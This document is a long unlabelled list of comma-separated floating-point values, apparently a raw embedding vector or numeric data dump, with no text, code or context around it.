0.015024731867015362, 0.031039465218782425, -0.023992981761693954, 0.025725485756993294, 0.0033467153552919626, 0.018489737063646317, 0.04117242246866226, -0.01956709288060665, -0.00893185380846262, -0.016509734094142914, -0.013328625820577145, 0.00018608028767630458, 0.01511208526790142, -0.008021925576031208, 0.008014646358788013, 0.00308101624250412, 0.023119451478123665, -0.006063760258257389, -0.007159313652664423, -0.003168369410559535, 0.018242238089442253, 0.00174615194555372, -0.012440536171197891, 0.01461708452552557, -0.011472372338175774, -0.029350638389587402, 0.0005873585469089448, 0.03901771456003189, -0.019683564081788063, -0.02735607698559761, 0.01014023832976818, -0.004560559522360563, 0.012651639059185982, 0.010263988748192787, -0.015563408844172955, 0.011989211663603783, -0.018256796523928642, 0.0012092944234609604, -0.02447342500090599, 0.03555271029472351, -0.011625240556895733, -0.012789948843419552, 0.00687541626393795, -0.0001194280557683669, -0.004087396897375584, -0.03287388011813164, -0.0005650653038173914, -0.004775302484631538, -0.007949131540954113, 0.006311261095106602, -0.032204173505306244, -0.013066566549241543, -0.017077529802918434, -0.005452288780361414, 0.0001261387806152925, -0.031068583950400352, 0.0070501226000487804, 0.009303104132413864, 0.0075196451507508755, -0.02649710513651371, -0.025172248482704163, 0.020717240869998932, -0.004997324664145708, -0.0016933761071413755, -0.0018162163905799389, -0.008720749989151955, -0.011923696845769882, -0.008859059773385525, -0.0075196451507508755, -0.0161312036216259, 0.019523415714502335, -0.01159612275660038, -0.003916330169886351, 0.003222965169698, -0.022391509264707565, 0.02563813328742981, -0.018256796523928642, -0.017208559438586235, -0.016480617225170135, -0.019785474985837936, -0.025725485756993294, -0.01078810729086399, 0.011363181285560131, 0.03135975822806358, 0.0826360285282135, -0.0036797490902245045, 0.008101998828351498, -0.0022056656889617443, 0.006613356992602348, 0.010431415401399136, -0.009798104874789715, -0.009994649328291416, 0.008851779624819756, -0.005648833233863115, 0.013088405132293701, -0.008669794537127018, 0.015927379950881004, 0.006012804340571165, 0.009536045603454113, 0.003601495176553726, 0.007592439651489258, -0.017790913581848145, 0.010023767128586769, -0.03590212017297745, 0.006263944786041975, 0.014646201394498348, -0.004458647221326828, -0.007439571898430586, 0.0251868087798357, -0.0280985776335001, -0.035931237041950226, -0.011130239814519882, -0.045161549001932144, -0.013889141380786896, 0.022493422031402588, -0.02277003973722458, -0.013394140638411045, 0.0006478687864728272, 0.00019267726747784764, 0.007869057357311249, 0.0037106864620000124, -0.0007911824504844844, 0.004152911715209484, -0.012404139153659344, 0.007774425204843283, -0.01902841590344906, -0.026322398334741592, 0.014893702231347561, -0.02001841738820076, -0.017514295876026154, 0.011435975320637226, 0.0024695447646081448, -0.004629713948816061, -0.013081125915050507, 0.014151200652122498, -0.008152955211699009, 0.028142254799604416, 0.014799069613218307, 0.002245702315121889, 0.008021925576031208, -0.008189352229237556, -0.014799069613218307, -0.006049201823771, -0.016640763729810715, 0.005583318416029215, 0.00234397454187274, 0.004804420284926891, 0.00057188980281353, 0.0019199481466785073, 0.0012502411846071482, -0.02303209900856018, 0.03135975822806358, -0.02795298956334591, 0.017936501652002335, 0.003091935534030199, 0.004254823550581932, 0.0050410013645887375, -0.009310383349657059, -0.0032411636784672737, 0.02476460114121437, 0.017921943217515945, 0.03660094738006592, -0.04743272811174393, 0.00040264317067340016, 0.03700859472155571, 0.022260479629039764, -0.02234783209860325, 0.03170917183160782, -0.0041274335235357285, 0.03430064767599106, -0.0146098043769598, -0.004014602396637201, -0.022129449993371964, -0.013823626562952995, 0.008327661082148552, -0.008444132283329964, 0.018082089722156525, -0.003505042754113674, -0.007526924833655357, 0.01844606176018715, 0.0018799112876877189, -0.013430537655949593, -0.01800929568707943, 0.003366733668372035, 0.0011228511575609446, 0.006824460346251726, 0.024735484272241592, -0.03069005347788334, -0.030893877148628235, 0.02032415196299553, -0.0020018417853862047, 0.01755797117948532, -0.005667031742632389, -0.006860857363790274, -0.02463357150554657, 0.0005377674824558198, 0.020950183272361755, -0.020498858764767647, -0.02376004122197628, 0.014718996360898018, -0.0018407844472676516, 0.016174880787730217, -0.014566128142178059, -0.017820030450820923, -0.018256796523928642, -0.00813111662864685, 0.022129449993371964, -0.025972986593842506, 0.02852078527212143, 0.01985826902091503, 0.014515171758830547, -0.016014734283089638, 0.04248271882534027, 0.03409682214260101, 0.002212944906204939, 0.006103797350078821, 0.013052008114755154, -0.00540133286267519, 0.014318627305328846, -0.026176810264587402, 0.02102297730743885, 0.008771706372499466, -0.01582546904683113, -0.004043720196932554, 0.006460489239543676, 0.021066654473543167, 0.02435695379972458, 0.01828591339290142, -0.0055396417155861855, -0.020426064729690552, 0.014296789653599262, 0.008160234428942204, 0.018344148993492126, -0.014223995618522167, -0.002889931434765458, -0.03485388308763504, -0.018460620194673538, 0.014194877818226814, 0.011683476157486439, -0.0005036451620981097, 0.019217681139707565, -0.0024786440189927816, 0.010060164146125317, 0.011552446521818638, -0.0033685537055134773, -0.014515171758830547, 0.03069005347788334, -0.007599718868732452, 0.014864584431052208, 0.014078406617045403, 0.00920847151428461, -0.0342424139380455, -0.012513330206274986, -0.016233116388320923, 0.014769951812922955, -0.0069190929643809795, -0.031039465218782425, 0.023658128455281258, 0.007425012998282909, 0.007905454374849796, -0.003008222207427025, 0.008917294442653656, 0.012367742136120796, -0.03499947115778923, -0.016335029155015945, 0.0011328604305163026, -0.01045325305312872, -0.01942150481045246, 0.021285036578774452, -0.028710050508379936, -0.0069991666823625565, 0.009463251568377018, -0.04935449734330177, 0.007355858106166124, -0.004749824292957783, 0.011435975320637226, 0.005910892505198717, -0.011603401973843575, 0.02290106937289238, -0.015141203068196774, -0.0017097548115998507, -0.011050166562199593, -0.006187510676681995, 0.006085598841309547, -0.013110242784023285, -0.0027498025447130203, 0.0019563452806323767, 0.01232406497001648, -0.01254244800657034, -0.02850622497498989, -0.009106559678912163, 0.047898612916469574, -0.01534502673894167, -0.01007472351193428, -0.021357830613851547, 0.025696367025375366, 0.02189650759100914, 0.008968250826001167, 0.03293211758136749, 0.015898263081908226, 0.011523328721523285, 0.00244770641438663, -0.017470618709921837, -0.00522662652656436, -0.01786370761692524, -0.0018480638973414898, -0.0006078319274820387, -0.010642518289387226, -0.0405900701880455, 0.001602383330464363, 0.02129959501326084, -0.010831783525645733, 0.013284949585795403, 0.009244868531823158, -0.038668300956487656, 0.006718908436596394, -0.012200315482914448, 0.016058409586548805, -0.0029554462525993586, 0.0075196451507508755, 0.013692596927285194, 0.009528766386210918, 0.006566040683537722, 0.01273899246007204, 0.004156551323831081, -0.004826258402317762, -0.03604770824313164, -0.002338515128940344, 0.002511401427909732, -0.00017527489399071783, -0.004149272106587887, -0.009317663498222828, -0.008473250083625317, 0.029932992532849312, -0.0049900454469025135, -0.021998420357704163, -0.012768110260367393, -0.0020837353076785803, -0.009172074496746063, 0.01726679503917694, -0.01237502135336399, -0.01153060793876648, -0.00972531083971262, 0.001156518585048616, 0.00738133629783988, -0.011734431609511375, 0.004913611337542534, 0.010693474672734737, -0.01655341126024723, 0.029991228133440018, -0.01332134660333395, 0.004567838739603758, 0.02691931091248989, 0.010038326494395733, -0.0008562423172406852, -0.004604235757142305, 0.00460787583142519, -0.018184002488851547, -0.0032757408916950226, -0.003576017217710614, 0.005474126897752285, -0.00048772143782116473, -0.01000920869410038, -0.003235704032704234, -0.0023658128920942545, 0.029175933450460434, -0.00032097712391987443, -0.030340639874339104, 0.0037561829667538404, -0.023119451478123665, -0.02028047665953636, 0.011887299828231335, -0.01476267259567976, -0.018911944702267647, 0.017689000815153122, 0.010314944200217724, -0.012702595442533493, -0.02793843112885952, 0.030049463734030724, 0.002207485493272543, -0.023847393691539764, 0.040240656584501266, -0.01050420943647623, 0.012076565064489841, 0.0007675242959521711, 0.03986212611198425, 0.011952814646065235, -0.002085555111989379, -0.011647079139947891, -0.0044222502037882805, -0.021678125485777855, 0.010911856777966022, 0.005481406580656767, -0.00964523758739233, -0.011304945684969425, -0.012193035334348679, -0.016233116388320923, -0.034766532480716705, -0.005485046189278364, -0.010176635347306728, -0.002172908280044794, -0.007730748504400253, -0.022639010101556778, 0.015796350315213203, 0.007949131540954113, -0.004160190932452679, -0.02622048556804657, -0.032466232776641846, -0.012258550152182579, 0.010300385765731335, 0.008058322593569756, -0.00311377365142107, 0.012083844281733036, -0.0320003479719162, 0.00457511842250824, 0.027443429455161095, 0.020251357927918434, -0.015592526644468307, 0.011283108033239841, 0.004480485804378986, 0.004185669124126434, 0.01799473725259304, -0.008196631446480751, 0.009958252310752869, -0.013139360584318638, 0.0130228903144598, -0.003248443128541112, 0.014151200652122498, 0.02722504734992981, 0.003941808361560106, -0.020353270694613457, 0.01246237475425005, -0.006391334347426891, -0.02332327514886856, -0.015010173432528973, -0.007064681500196457, 0.0008689812966622412, 0.0059545692056417465, 0.00369066814891994, 0.009557884186506271, -0.00288265198469162, -0.01014023832976818, 0.011137519031763077, -0.02332327514886856, -0.009608840569853783, -0.01830047369003296, -0.006609717383980751, 0.0019436063012108207, 0.01404928881675005, -0.015548850409686565, -0.01598561555147171, 0.016902823001146317, -0.005648833233863115, 0.003970926161855459, -0.010358620434999466, 0.0002902670530602336, 0.010795386508107185, 0.016364146023988724, 0.025681808590888977, -0.005357656162232161, 0.010999210178852081, -0.014784511178731918, -0.006234826985746622, 0.030748289078474045, 0.004065558314323425, -0.003978205379098654, -0.01582546904683113, 0.01875179633498192, -0.010431415401399136, -0.01830047369003296, -0.0006483237375505269, 0.00453144172206521, 0.015417820774018764, -0.008116558194160461, 0.014493334107100964, 0.025594456121325493, -0.00024636302259750664, 0.026831958442926407, -0.0015969236847013235, -0.00994369387626648, -0.0024586254730820656, 0.018387826159596443, -0.028316961601376534, 0.005099236965179443, 0.0025205006822943687, -0.008982809260487556, 0.0011110221967101097, 0.01511208526790142, -0.015752675011754036, 0.017397824674844742, -0.020688124001026154, -0.012222153134644032, 0.00901192706078291, -0.013233993202447891, 0.00633673882111907, 0.004225705750286579, 0.008087440393865108, -0.005470487289130688, -0.014922820031642914, -0.008334941230714321, -0.005445009563118219, 0.01582546904683113, -0.0056597525253891945, -0.012615242041647434, 0.01802385412156582, 0.005452288780361414, -0.0015386883169412613, -0.025594456121325493, 0.003361274255439639, -0.007672513369470835, -0.0021255919709801674, -0.001293917652219534, -0.00023476143542211503, -0.03022417053580284, -0.005281222518533468, 0.00985634047538042, -0.0062493858858942986, -0.008007367141544819, -0.008036484010517597, 0.003949087578803301, -0.022784598171710968, -0.014733554795384407, -0.01174899097532034, 0.010875459760427475, 0.020964741706848145, -0.0251868087798357, -0.002933607902377844, -0.0008698911988176405, -0.0026315120048820972, -0.005750745069235563, -0.02477915957570076, 0.0014313168358057737, -0.013437816873192787, 0.011144798249006271, 0.008553323335945606, -0.014173039235174656, 0.007716189604252577, 0.011421416886150837, -0.010060164146125317, 0.008662515319883823, 0.009485090151429176, -0.0024586254730820656, 0.005412252154201269, -0.006788063328713179, 0.03546535596251488, -0.02332327514886856, 0.022799156606197357, 0.00793457217514515, 0.0013758111745119095, 0.02100841887295246, -0.00214561028406024, -0.012484212405979633, 0.0011183015303686261, -0.0009158425964415073, 0.028127696365118027, 0.015461497008800507, 0.0037379844579845667, -0.0029063101392239332, -0.002598754595965147, -0.015883704647421837, -0.003581476863473654, -0.0130228903144598, 0.01549061480909586, -0.0034140499774366617, 0.0039745657704770565, 0.019261356443166733, -0.014092965982854366, -0.00792001374065876, -0.007235747762024403, 0.00027479827986098826, 0.003483204636722803, 0.002822596812620759, 0.00793457217514515, -0.012819066643714905, 0.013365022838115692, -0.011443255469202995, 0.000190971142728813, 0.0019399665761739016, 0.030631817877292633, 0.016072968021035194, 0.022828275337815285, 0.0006496886489912868, -0.0030318801291286945, -0.006915453355759382, -0.00858244113624096, -0.019698122516274452, -0.0006983697530813515, -0.0002161079173674807, 0.001527769141830504, -0.0036124142352491617, -0.021823713555932045, -0.004935449920594692, 0.015286791138350964, -0.01901385560631752, 0.007312181871384382, -0.00619478989392519, -0.009419575333595276, -0.0009335861541330814, -0.0009185723611153662, 0.005168391391634941, -0.019800033420324326, -0.006049201823771, -0.03039887547492981, -0.013284949585795403, 0.005699789151549339, 0.004273022059351206, 0.007326740771532059, -0.03039887547492981, 0.008720749989151955, 0.006533283274620771, 0.01742694154381752, -0.00907744187861681, -0.0015678060008212924, -0.023527098819613457, 0.004105595406144857, -0.002760721603408456, -0.01202560868114233, 0.007643395569175482, 0.01815488375723362, -0.0002568271884229034, 0.003135612001642585, 0.005787142552435398, 0.002877192571759224, -0.009754428640007973, 0.017237676307559013, -0.0003043709439225495, 0.004586037248373032, 0.03194211423397064, 0.006118356250226498, -0.004735265392810106, -0.00856788270175457, 0.010635239072144032, -0.0005059199756942689, 0.006198429968208075, 0.013597964309155941, 0.009783546440303326, -0.0022784597240388393, -0.019406944513320923, 0.017368705943226814, -0.0028335158713161945, 0.000659697805531323, 0.007097438909113407, 0.01511208526790142, 0.020833712071180344, -0.005914532113820314, -0.026002103462815285, 0.017674442380666733, 0.012644359841942787, 0.00821847002953291, 0.015301349572837353, -0.0012611602433025837, 0.0011901858961209655, 0.0018107568612322211, -0.01353244949132204, -0.000021354873751988634, 0.005969128105789423, -0.010795386508107185, 0.009492369368672371, -0.010627959854900837, 0.018038414418697357, -0.00006306939030764624, -0.010475091636180878, -0.003970926161855459, -0.022842833772301674, 0.005095596890896559, -0.013787229545414448, -0.03066093474626541, -0.0034358883276581764, -0.01888282597064972, 0.008145675994455814, -0.007752587087452412, -0.009863619692623615, -0.006795342545956373, 0.008320381864905357, 0.004163830541074276, 0.021052096039056778, -0.014107524417340755, -0.01525767333805561, -0.006100157741457224, 0.003938168752938509, -0.006653393618762493, -0.04216242581605911, -0.009230310097336769, 0.007210270036011934, -0.02330871671438217, 0.021488860249519348, -0.0022730003111064434, -0.005859936587512493, -0.00630398141220212, 0.004043720196932554, 0.03368917480111122, -0.007406814489513636, -0.0027043060399591923, -0.012629801407456398, -0.00015582518244627863, 0.009958252310752869, -0.0016842768527567387, 0.0023730923421680927, -0.00579806137830019, 0.002156529575586319, 0.000059827769291587174, -0.002713405527174473, 0.009987370111048222, -0.02349798195064068, 0.008895456790924072, -0.0007233928190544248, -0.0005341277574189007, 0.007577880751341581, -0.01043869461864233, -0.010919136926531792, -0.002758901799097657, -0.01629135198891163, 0.007643395569175482, 0.006729827728122473, 0.01685914769768715, 0.02766181342303753, 0.013561567291617393, 0.0033903918229043484, -0.011610682122409344, 0.0356982983648777, -0.00438949279487133, -0.014558848924934864, -0.017805472016334534, -0.0019035694422200322, 0.021678125485777855, -0.008691633120179176, -0.014296789653599262, 0.01987282931804657, -0.025143131613731384, 0.014573407359421253, 0.021678125485777855, 0.019552534446120262, 0.007643395569175482, 0.015010173432528973, 0.0021292315796017647, 0.021503418684005737, -0.012600683607161045, 0.008116558194160461, 0.006325819529592991, 0.021692683920264244, -0.012265830300748348, 0.0034959434997290373, 0.006897254381328821, 0.017048411071300507, 0.018664443865418434, 0.004553279839456081, 0.0026988466270267963, -0.024284159764647484, 0.011865461245179176, 0.01196009386330843, -0.019479740411043167, 0.00863339751958847, 0.002172908280044794, 0.0023912908509373665, -0.014886423014104366, 0.012506050989031792, 0.016524292528629303, -0.020513417199254036, -0.023148570209741592, 0.009863619692623615, -0.020105769857764244, -0.011130239814519882, -0.009288545697927475, 0.000345090200426057, 0.02086283080279827, 0.002666089218109846, 0.001358522567898035, -0.014129363000392914, -0.005212067626416683, -0.014813628979027271, -0.014755393378436565, -0.008691633120179176, 0.002662449376657605, -0.018067531287670135, 0.005768943578004837, -0.004222066141664982, 0.014092965982854366, -0.01713576540350914, 0.0120328888297081, -0.03732888773083687, -0.013343185186386108, 0.010467812418937683, -0.009885458275675774, -0.003963646478950977, 0.0009945513447746634, -0.007170232944190502, -0.006238466594368219, 0.0011164817260578275, -0.00214561028406024, 0.0022347832564264536, 0.0056306347250938416, 0.018533414229750633, 0.007905454374849796, -0.006533283274620771, 0.012928257696330547, -0.026700928807258606, 0.006445930339396, 0.01830047369003296, 0.004229345358908176, 0.024255041033029556, 0.0027206847444176674, -0.025521662086248398, 0.01108656357973814, -0.005474126897752285, 0.0013385041384026408, 0.004116514697670937, -0.00007131561142159626, -0.018795473501086235, -0.002655169926583767, 0.010991930961608887, -0.010555164888501167, -0.012709874659776688, -0.02176547795534134, 0.004669750574976206, 0.004302139859646559, 0.026322398334741592, 0.025419749319553375, 0.000113911613880191, -0.000027312058591633104, -0.007104718126356602, 0.0035832966677844524, -0.004327617585659027, -0.015010173432528973, -0.0026351516135036945, 0.038231536746025085, -0.004546000622212887, 0.006282143294811249, 0.004367654677480459, 0.005645193625241518, 0.016393262892961502, 0.00695185037329793, 0.0038944920524954796, -0.028258726000785828, 0.014420540072023869, -0.008109278976917267, -0.0030027625616639853, -0.0275016650557518, 0.023396069183945656, 0.010475091636180878, -0.009492369368672371, -0.018635326996445656, -0.015548850409686565, -0.01015479676425457, -0.019610770046710968, 0.0006778963725082576, 0.004138352815061808, -0.011137519031763077, 0.012418697588145733, -0.0037561829667538404, -0.009798104874789715, 0.0026442508678883314, -0.026453427970409393, -0.005717987660318613, -0.019523415714502335, -0.024546219035983086, 0.014012891799211502, 0.03138887882232666, -0.019042974337935448, 0.0017852787859737873, 0.007046482991427183, -0.00046087856753729284, -0.031155936419963837, 0.008182073011994362, -0.03642623871564865, 0.032029468566179276, -0.009252148680388927, -0.01658252812922001, 0.0035214214585721493, 0.030078580603003502, 0.004080117214471102, -0.01656796969473362, 0.005929091013967991, 0.007912734523415565, -0.023439746350049973, -0.0057107084430754185, -0.018547972664237022, -0.004851736128330231, -0.008880897425115108, 0.0016214917413890362, 0.0034850244410336018, -0.007279424462467432, 0.00864795595407486, 0.012637080624699593, -0.008007367141544819, -0.008225749246776104, -0.04335625097155571, -0.003130152355879545, -0.008873618207871914, 0.012149359099566936, 0.017805472016334534, 0.007166593335568905, 0.0009745329152792692, -0.000578259292524308, -0.009936414659023285, -0.008910015225410461, 0.006744386628270149, -0.013787229545414448, 0.013328625820577145, 0.019625328481197357, 0.004920891020447016, -0.002640611259266734, 0.009965531527996063, 0.02508489601314068, 0.0028116777539253235, 0.01869356259703636, 0.0011765370145440102, -0.012870022095739841, -0.005859936587512493, -0.003796219825744629, 0.0011992851505056024, 0.010045605711638927, -0.0244588665664196, -0.0015496074920520186, -0.017747236415743828, -0.027909312397241592, 0.0019854630809277296, -0.006635195109993219, -0.007788984104990959, -0.011079283431172371, -0.015650762245059013, -0.009754428640007973, -0.02030959352850914, -0.03054446540772915, 0.007031924091279507, -0.0014349565608426929, 0.010380459018051624, 0.004957288037985563, 0.001653339248150587, -0.022551655769348145, -0.008407735265791416, 0.012404139153659344, -0.009339501149952412, -0.004738905467092991, -0.011843623593449593, 0.003177468664944172, 0.016160322353243828, -0.01008928194642067, 0.008859059773385525, 0.02811313606798649, 0.002957266056910157, 0.014733554795384407, -0.015374144539237022, -0.030282406136393547, 0.004458647221326828, -0.006584239192306995, -0.002729784231632948, 0.000011274577445874456, -0.027195928618311882, 0.0022711805067956448, -0.016771793365478516, -0.02405121736228466, 0.015213997103273869, 0.000058406007156008855, 0.0027115854900330305, -0.008327661082148552, 0.009463251568377018, -0.006049201823771, 0.010460533201694489, 0.006449569948017597, -0.005816259887069464, 0.0030264207161962986, -0.00907744187861681, -0.03141799569129944, 0.020921066403388977, 0.016320468857884407, 0.002431327709928155, -0.03415505960583687, -0.00217836769297719, 0.0023567136377096176, -0.0013030169066041708, 0.026409750804305077, -0.0014877323992550373, 0.0033394359052181244, -0.007563321851193905, -0.01726679503917694, 0.0025587177369743586, -0.012287667952477932, 0.022493422031402588, 0.04044448211789131, 0.0013994693290442228, -0.019945623353123665, -0.0031465310603380203, 0.009754428640007973, 0.01784914918243885, -0.00616203248500824, -0.0005709798424504697, -0.004382213577628136, 0.03529065102338791, 0.005270303227007389, 0.0035905761178582907, -0.0005118345143273473, 0.0014467856381088495, -0.00774530740454793, 0.006722548510879278, 0.017077529802918434, 0.014937378466129303, -0.02301754057407379, 0.0144132599234581, 0.006009164731949568, -0.0007998267537914217, -0.005197509191930294, -0.023235922679305077, -0.01246237475425005, 0.00016708554176148027, 0.009106559678912163, 0.013059287331998348, -0.010169356130063534, 0.008233029395341873, 0.010016487911343575, 0.0031283325515687466, 0.01252060942351818, -0.006940931081771851, -0.020411506295204163, -0.011137519031763077, -0.016102086752653122, 0.006322179920971394, 0.0036160540767014027, 0.008393175899982452, -0.026890194043517113, 0.016524292528629303, -0.015359585173428059, -0.01567987911403179, -0.009448693133890629, 0.001384000526741147, -0.01741238310933113, -0.0008648866205476224, -0.00957972276955843, -0.034766532480716705, -0.009317663498222828, -0.011421416886150837, 0.0004686129395850003, -0.010577003471553326, 0.005412252154201269, 0.007068321108818054, 0.010198473930358887, 0.002338515128940344, -0.01367075927555561, -0.004655191674828529, -0.032466232776641846, -0.006391334347426891, -0.025740044191479683, -0.007665233686566353, 0.02780740149319172, -0.02461901307106018, -0.01741238310933113, -0.010991930961608887, 0.00011482154513942078, 0.013226713985204697, 0.005372215062379837, 0.008378617465496063, -0.01598561555147171, -0.02028047665953636, 0.006791702937334776, 0.0014558848924934864, -0.022828275337815285, -0.014340465888381004, 0.004742545075714588, -0.009019207209348679, -0.04737449437379837, 0.0026788280811160803, -0.010278547182679176, -0.021547095850110054, -0.00820391159504652, -0.0036761092487722635, -0.007152034435421228, -0.0010910037672147155, -0.020557094365358353, -0.01585458591580391, 0.0018171262927353382, -0.006435011047869921, 0.01773267798125744, 0.002460445510223508, 0.009594281204044819, -0.005131994374096394, -0.012549727223813534, -0.017790913581848145, 0.015199437737464905, -0.012913698330521584, 0.010263988748192787, 0.00813839677721262, 0.004815339110791683, -0.00741409370675683, 0.009667075239121914, -0.012906419113278389, 0.010016487911343575, -0.03307770565152168, -0.003941808361560106, -0.010627959854900837, -0.011654358357191086, -0.003455906640738249, -0.023294158279895782, 0.0292196087539196, 0.014675319194793701, -0.016480617225170135, 0.027035782113671303, -0.003938168752938509, -0.03109770081937313, -0.010853622108697891, 0.010416856035590172, -0.01115207839757204, -0.015184879302978516, 0.01158156432211399, -0.005354016553610563, -0.019610770046710968, -0.00914295669645071, -0.0004056004108861089, -0.008611558936536312, -0.04411331191658974, -0.025114014744758606, -0.012637080624699593, -0.0059036132879555225, -0.015650762245059013, 0.010183914564549923, -0.013481494039297104, 0.021852832287549973, -0.0017288633389398456, 0.014355025254189968, -0.0017789093544706702, 0.022813715040683746, 0.0007970969891175628, -0.002491382881999016, 0.017747236415743828, 0.01267347764223814, 0.013357743620872498, 0.000690180400852114, -0.03144711256027222, -0.022537097334861755, 0.037678301334381104, -0.0021292315796017647, 0.016495175659656525, -0.007992807775735855, 0.0003061907773371786, 0.014078406617045403, -0.007781704422086477, 0.006740747019648552, 0.005721627734601498, -0.03316505625844002, -0.01549061480909586, 0.0004699778219219297, -0.004662471357733011, 0.016888264566659927, -0.004811699502170086, -0.008626118302345276, 0.008422293700277805, -0.001765260356478393, -0.035057708621025085, -0.0009572443086653948, -0.006591518875211477, 0.03188387677073479, -0.013794508762657642, -0.011006489396095276, -0.010322223417460918, -0.00396000687032938, 0.03613506257534027, 0.00850236788392067, 0.0011829064460471272, -0.029932992532849312, -0.007956410758197308, 0.013867303729057312, -0.011508770287036896, 0.006973688490688801, -0.012382300570607185, 0.02806946076452732, 0.0018981099128723145, -0.006253025494515896, -0.0010109300492331386, 0.009688913822174072, -0.00019108489505015314, 0.014769951812922955, 0.012418697588145733, -0.0038398962933570147, 0.002081915270537138, 0.02246430329978466, 0.032349761575460434, -0.02330871671438217, 0.020338712260127068, 0.000051695285947062075, -0.005987326614558697, -0.006420452147722244, 0.00033303367672488093, -0.003930889070034027, -0.0039236098527908325, -0.004957288037985563, -0.003792579984292388, -0.009965531527996063, -0.01319031696766615, -0.008917294442653656, 0.030195051804184914, -0.030078580603003502, 0.006635195109993219, -0.01658252812922001, -0.0018480638973414898, 0.0026788280811160803, -0.005717987660318613, 0.004265742842108011, -0.009448693133890629, -0.015461497008800507, -0.00015241294750012457, 0.02448798343539238, -0.012571565806865692, -0.019974740222096443, -0.01869356259703636, -0.014362304471433163, -0.018649885430932045, -0.022275038063526154, -0.03514505922794342, 0.027035782113671303, -0.005994605831801891, -0.010999210178852081, -0.011108401231467724, 0.005965488031506538, -0.006202069576829672, 0.015184879302978516, -0.03814418241381645, -0.006220268085598946, -0.015403262339532375, -0.010846341960132122, 0.02693386934697628, 0.009106559678912163, 0.00899736862629652, 0.007290343288332224, -0.014937378466129303, -0.022711804136633873, 0.012294948101043701, -0.00800008699297905, 0.0008808103739283979, 0.021983861923217773, -0.02866637334227562, -0.028841080144047737, -0.004411331377923489, 0.0006674322066828609, -0.022988421842455864, -0.0009490549564361572, -0.014784511178731918, -0.027108576148748398, 0.013430537655949593, -0.006274863611906767, -0.007803543005138636, -0.014420540072023869, -0.016640763729810715, -0.006930011790245771, 0.0010928235715255141, 0.02204209752380848, 0.010911856777966022, -0.0002866273280233145, 0.014624363742768764, -0.0047461846843361855, 0.003168369410559535, -0.00807288195937872, -0.016174880787730217, 0.005583318416029215, 0.005943649914115667, 0.003481384599581361, -0.000012404878361849114, -0.015243114903569221, 0.004018242005258799, -0.01915944553911686, 0.009870899841189384, 0.013568847440183163, 0.017383266240358353, -0.013547008857131004, 0.009900016710162163, -0.02291562780737877, 0.00475346390157938, 0.005077398382127285, 0.0038362566847354174, 0.009601560421288013, -0.006031002849340439, -0.011508770287036896, -0.007253946270793676, -0.003204766660928726, -0.018227677792310715, 0.004848096519708633, 0.01942150481045246, -0.006966409273445606, -0.0028407953213900328, -0.018970180302858353, 0.005750745069235563, -0.009805385023355484, -0.01418031845241785, -0.005688870325684547, 0.01064979750663042, 0.02923416905105114, 0.0051938691176474094, -0.005823539569973946, -0.031010348349809647, 0.008560603484511375, 0.008458690717816353, -0.016451498493552208, 0.00914295669645071, -0.003472285345196724, -0.002136511029675603, 0.006944570690393448, -0.00021064834436401725, 0.003945447970181704, 0.007377696689218283, 0.003257542382925749, 0.023294158279895782, -0.002034599194303155, 0.0056597525253891945, 0.011872741393744946, 0.002700666431337595, -0.010445973835885525, 0.005943649914115667, -0.013212155550718307, -0.0050628394819796085, 0.0026278721634298563, -0.011377740651369095, 0.003883572993800044, 0.008917294442653656, -0.004589676856994629, 0.012549727223813534, 0.007101078517735004, 0.048015084117650986, 0.01151604950428009, -0.004302139859646559, -0.0005373125313781202, 0.012294948101043701, 0.014580686576664448, 0.010263988748192787, 0.011574285104870796, 0.01116663683205843, 0.018533414229750633, 0.026118574663996696, 0.014238554053008556, -0.011923696845769882, 0.0014076586812734604, -0.016102086752653122, -0.007839939557015896, -0.01572355628013611, 0.014449656940996647, 0.0004950008587911725, 0.014151200652122498, 0.027880195528268814, -0.002818956971168518, -0.012724434025585651, -0.013743553310632706, -0.01181450579315424, 0.005838098470121622, -0.006416812539100647, -0.0033885720185935497, -0.002081915270537138, -0.004123793914914131, 0.023701805621385574, -0.011392299085855484, -0.013233993202447891, 0.00626030471175909, -0.005106516182422638, -0.02014944702386856, 0.01045325305312872, -0.007188431452959776, -0.0030100420117378235, 0.014507892541587353, 0.0016487896209582686, 0.026890194043517113, 0.005987326614558697, 0.024429747834801674, -0.01088273897767067, -0.000359649071469903, -0.003299399046227336, 0.0034650058951228857, -0.014311348088085651, 0.0047461846843361855, -0.00214561028406024, 0.007606998551636934, 0.008822662755846977, -0.012011050246655941, 0.004851736128330231, 0.007341299671679735, -0.007133835926651955, -0.004083757288753986, -0.0021601691842079163, 0.00009178899199469015, 0.01093369536101818, 0.01614576391875744, 0.01151604950428009, 0.010940974578261375, 0.0035068627912551165, -0.020950183272361755, 0.027312399819493294, -0.006143833976238966, -0.021561654284596443, -0.006686151027679443, -0.01945062167942524, -0.0066970703192055225, 0.009972811676561832, -0.01145053468644619, -0.02576916292309761, 0.0014877323992550373, 0.01007472351193428, -0.005801700986921787, 0.013634362258017063, -0.018679002299904823, 0.005583318416029215, 0.010249429382383823, -0.009448693133890629, -0.005121075082570314, -0.017092088237404823, 0.002127411775290966, -0.003344895550981164, 0.006394974421709776, -0.004600596148520708, 0.003366733668372035, -0.02335239388048649, 0.010700753889977932, 0.01771811954677105, 0.014850025996565819, -0.010991930961608887, 0.01985826902091503, 0.029015785083174706, -0.0064532095566391945, -0.006973688490688801, -0.01915944553911686, -0.002562357345595956, -0.002380371792241931, -0.006773504428565502, 0.009732590056955814, 0.009958252310752869, -0.00928126648068428, -0.0069991666823625565, 0.004571478348225355, -0.014376862905919552, -0.0032429834827780724, -0.002578736050054431, 0.004171110223978758, -0.010686194524168968, 0.0013867303496226668, -0.0028007584623992443, -0.025987545028328896, -0.002098293974995613, -0.014085685834288597, 0.01669899933040142, -0.001954525476321578, 0.0043931324034929276, 0.00472070649266243, -0.0005677951266989112, 0.0029991227202117443, -0.020702682435512543, -0.003605135018005967, 0.011246711015701294, 0.02319224551320076, 0.00457511842250824, -0.005419531371444464, -0.009776267223060131, -0.004960927646607161, 0.012651639059185982, 0.012447815388441086, -0.006846298463642597, -0.006311261095106602, -0.0016642584232613444, -0.005288501735776663, 0.008910015225410461, -0.001169257564470172, 0.028127696365118027, 0.015403262339532375, -0.00971075240522623, -0.03165093809366226, -0.029423432424664497, -0.008393175899982452, 0.0259147509932518, -0.03386388346552849, -0.013248552568256855, 0.003872653702273965, -0.03974565863609314, -0.002780740149319172, -0.008444132283329964, -0.001457704696804285, 0.0035032229498028755, 0.017834588885307312, 0.00798552855849266, -0.025172248482704163, 0.00964523758739233, 0.014653481543064117, -0.0028335158713161945, -0.022420626133680344, -0.017689000815153122, 0.0007889076368883252, 